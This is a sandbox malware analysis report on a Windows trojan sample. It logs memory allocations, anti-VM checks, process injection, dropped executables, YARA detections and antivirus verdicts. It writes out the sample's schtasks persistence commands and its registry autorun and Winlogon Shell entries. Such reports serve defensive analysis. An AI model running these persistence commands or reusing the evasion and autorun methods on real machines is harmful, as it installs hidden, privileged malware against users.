NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91acc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91a8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:25 a.m.	process_identifier: 1768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

mobsync.exe tried to sleep 129 seconds, actually delayed analysis time by 129 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 20, 2021, 9:25 a.m.	total_number_of_free_bytes: 13721358336 free_bytes_available: 13721358336 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW Sept. 20, 2021, 9:33 a.m.	total_number_of_free_bytes: 13714051072 free_bytes_available: 13714051072 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Looks up the external IP address (2 events)

domain	ipinfo.io
domain	ip-api.com

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\DriverMaster.exe
file	C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat
file	C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat"
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe
file	C:\Users\test22\AppData\Local\Temp\DriverMaster.exe
file	C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 20, 2021, 9:32 a.m.	thread_identifier: 2076 thread_handle: 0x00000038 process_identifier: 1160 current_directory: filepath: track: 1 command_line: cmd /c start C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1
CreateProcessInternalW Sept. 20, 2021, 9:32 a.m.	thread_identifier: 1304 thread_handle: 0x00000038 process_identifier: 2056 current_directory: filepath: track: 1 command_line: cmd /c start C:\Users\test22\AppData\Local\Temp\DriverMaster.exe filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1
ShellExecuteExW Sept. 20, 2021, 9:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat	1	1
ShellExecuteExW Sept. 20, 2021, 9:25 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 20, 2021, 9:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe	1	1
ShellExecuteExW Sept. 20, 2021, 9:33 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 20, 2021, 9:33 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 20, 2021, 9:33 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x002ada00', u'virtual_address': u'0x00002000', u'entropy': 7.956197859865559, u'name': u'.rdata', u'virtual_size': u'0x002ad861'}

entropy

7.95619785987

description

A section with a high entropy has been found

entropy

0.998907302859

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 20, 2021, 9:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 20, 2021, 9:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 20, 2021, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 20, 2021, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 90 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
cmdline	chcp 65001
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit

Communicates with host for which no DNS query was performed (1 event)

host

62.109.1.30

Installs itself for autorun at Windows startup (21 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mobsync	reg_value	"C:\Program Files\Windows NT\TableTextService\mobsync.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mobsync	reg_value	"C:\Program Files\Windows NT\TableTextService\mobsync.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe", "C:\Documents and Settings\smss.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\smss	reg_value	"C:\Documents and Settings\smss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss	reg_value	"C:\Documents and Settings\smss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe", "C:\Documents and Settings\smss.exe", "C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe", "C:\Documents and Settings\smss.exe", "C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe", "C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mobsync	reg_value	"C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mobsync	reg_value	"C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe", "C:\Documents and Settings\smss.exe", "C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe", "C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe", "C:\Windows\System32\pnpts\winlogon.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\Windows\System32\pnpts\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\Windows\System32\pnpts\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Program Files\Windows NT\TableTextService\mobsync.exe", "C:\Documents and Settings\smss.exe", "C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\csrss.exe", "C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe", "C:\Windows\System32\pnpts\winlogon.exe", "C:\Windows\twunk_16\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\twunk_16\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\twunk_16\explorer.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1160 resumed a thread in remote process 1768
Process injection	Process 2056 resumed a thread in remote process 668
Process injection	Process 3052 resumed a thread in remote process 1048
NtResumeThread Sept. 20, 2021, 9:32 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 1768	1	0	0
NtResumeThread Sept. 20, 2021, 9:32 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 668	1	0	0
NtResumeThread Sept. 20, 2021, 9:32 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 1048	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

"C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe"

Generates some ICMP traffic

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Gen:Variant.Razy.927089
FireEye	Generic.mg.d5d4f07e59ffad62
Cylance	Unsafe
Cybereason	malicious.e59ffa
Arcabit	Trojan.Razy.DE2571
BitDefenderTheta	AI:Packer.33EF4C371F
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/GenKryptik.FKHS
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Variant.Razy.927089
Avast	Win32:TrojanX-gen [Trj]
Rising	Trojan.Generic@ML.87 (RDML:gcGNDPpHmx85/rcIUhgf+g)
Ad-Aware	Gen:Variant.Razy.927089
Sophos	ML/PE-A
Emsisoft	Gen:Variant.Razy.927089 (B)
eGambit	Unsafe.AI_Score_99%
Avira	TR/Crypt.ZPACK.Gen
Microsoft	Trojan:MSIL/CoinMinerInj!MTB
GData	Gen:Variant.Razy.927089
Cynet	Malicious (score: 100)
VBA32	BScope.Trojan.Nitol
ALYac	Gen:Variant.Razy.927089
MAX	malware (ai score=83)
Malwarebytes	MachineLearning/Anomalous.100%
Fortinet	W32/Tiny.NFR!tr
AVG	Win32:TrojanX-gen [Trj]

Stubchik.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All